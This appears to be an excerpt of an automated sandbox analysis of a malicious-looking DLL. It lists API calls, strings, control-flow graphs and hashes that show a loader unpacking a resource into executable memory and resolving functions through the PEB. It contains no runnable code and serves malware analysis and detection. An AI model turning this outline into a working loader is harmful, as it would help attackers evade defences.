___DllMainCRTStartup 32124->32176 32126 1000254b ___DllMainCRTStartup 32125->32126 32141 100019c0 32126->32141 32129 1000257f ___DllMainCRTStartup 32129->32124 32151 10001ff0 32129->32151 32133 100025e8 ___DllMainCRTStartup 32133->32124 32133->32135 32170 33e991 32133->32170 32135->31984 32136 1000264f SetLastError 32136->32124 32139 100019ab 32138->32139 32140 1000199f SetLastError 32138->32140 32139->32104 32139->32105 32139->32135 32140->32139 32142 100019f0 32141->32142 32143 10001a83 32142->32143 32145 10001a2c VirtualAlloc 32142->32145 32150 10001aa0 ___DllMainCRTStartup 32142->32150 32144 10001990 ___DllMainCRTStartup SetLastError 32143->32144 32146 10001a9c 32144->32146 32147 10001a50 32145->32147 32148 10001a57 ___DllMainCRTStartup 32145->32148 32149 10001aa4 VirtualAlloc 32146->32149 32146->32150 32147->32150 32148->32142 32149->32150 32150->32129 32152 10002029 IsBadReadPtr 32151->32152 32161 1000201f 32151->32161 32154 10002053 32152->32154 32152->32161 32155 10002085 SetLastError 32154->32155 32156 10002099 32154->32156 32154->32161 32155->32161 32177 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32156->32177 32158 100020b3 32159 100020bf SetLastError 32158->32159 32162 100020e9 32158->32162 32159->32161 32161->32124 32164 10001cb0 32161->32164 32162->32161 32163 100021f9 SetLastError 32162->32163 32163->32161 32165 10001cf8 ___DllMainCRTStartup 32164->32165 32166 10001e01 32165->32166 32168 10001ddd 32165->32168 32178 10001b80 32165->32178 32167 10001b80 ___DllMainCRTStartup 2 API calls 32166->32167 32167->32168 32168->32133 32171 33ea62 32170->32171 32172 33ea8d 32170->32172 32185 33f8fd 32171->32185 32172->32135 32172->32136 32176->32135 32177->32158 32179 10001b9c 32178->32179 32181 10001b92 32178->32181 32180 10001baa 32179->32180 32183 10001c04 VirtualProtect 32179->32183 32180->32181 32184 10001be2 VirtualFree 32180->32184 32181->32165 32183->32181 32184->32181 32194 33fde0 32185->32194 32186 33ffd1 32209 33ab87 32186->32209 32189 33ea75 32189->32172 32198 3393ed 32189->32198 32192 34dcf7 GetPEB 32192->32194 32194->32186 32194->32189 32194->32192 32197 33a8b0 GetPEB 32194->32197 32201 33b23c 32194->32201 32205 3446bb 32194->32205 32219 34da22 GetPEB 32194->32219 32220 3347ce GetPEB 32194->32220 32221 33f899 GetPEB 32194->32221 32222 334b61 32194->32222 32197->32194 32199 34aa30 GetPEB 32198->32199 32200 339456 ExitProcess 32199->32200 32200->32172 32202 33b254 32201->32202 32226 34aa30 32202->32226 32206 3446da 32205->32206 32207 34aa30 GetPEB 32206->32207 32208 344729 SHGetFolderPathW 32207->32208 32208->32194 32210 33abb0 32209->32210 32211 334b61 GetPEB 32210->32211 32212 33ad67 32211->32212 32234 337f5d 32212->32234 32214 33ad99 32218 33ada4 32214->32218 32238 341e67 GetPEB 32214->32238 32216 33adc4 32239 341e67 GetPEB 32216->32239 32218->32189 32219->32194 32220->32194 32221->32194 32223 334b74 32222->32223 32240 331ea7 32223->32240 32227 34ab1d 32226->32227 32231 33b2b8 lstrcmpiW 32226->32231 32232 340a0e GetPEB 32227->32232 32229 34ab33 32233 33cdcd GetPEB 32229->32233 32231->32194 32232->32229 32233->32231 32235 337f8e 32234->32235 32236 34aa30 GetPEB 32235->32236 32237 337fd4 CreateProcessW 32236->32237 32237->32214 32238->32216 32239->32218 32241 331ebc 32240->32241 32244 33702c 32241->32244 32245 337049 32244->32245 32246 34aa30 GetPEB 32245->32246 32247 331f4c 32246->32247 32247->32194

                                                                                                                          Executed Functions

                                                                                                                          Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                          • _printf.LIBCMT ref: 1001265F
                                                                                                                          • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                          • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                          • _malloc.LIBCMT ref: 100127F5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                          • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                          • API String ID: 572389289-2839844625
                                                                                                                          • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                          • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                          • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                          • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 33e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                          • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                          • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                          • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                          • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                          APIs
                                                                                                                          • _malloc.LIBCMT ref: 10006A9C
                                                                                                                            • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                            • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                            • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 501242067-0
                                                                                                                          • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                          • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                          • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                          • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                          • GlobalHandle.KERNEL32(003B7AF0), ref: 100208A9
                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                          • GlobalHandle.KERNEL32(003B7AF0), ref: 100208DB
                                                                                                                          • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                          • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                          • _memset.LIBCMT ref: 10020911
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 496899490-0
                                                                                                                          • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                          • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                          • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                          • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • __lock.LIBCMT ref: 1002FA87
                                                                                                                            • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                            • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                            • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                          • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                          • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                          • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                          • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2714421763-0
                                                                                                                          • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                          • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                          • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                          • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                          APIs
                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                          • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$CreateDestroy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3296620671-0
                                                                                                                          • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                          • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                          • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                          • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000B.00000002.496825866.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000B.00000002.496820374.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496851178.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496859932.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496865003.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          • Associated: 0000000B.00000002.496869651.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                          • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                          • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                          • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%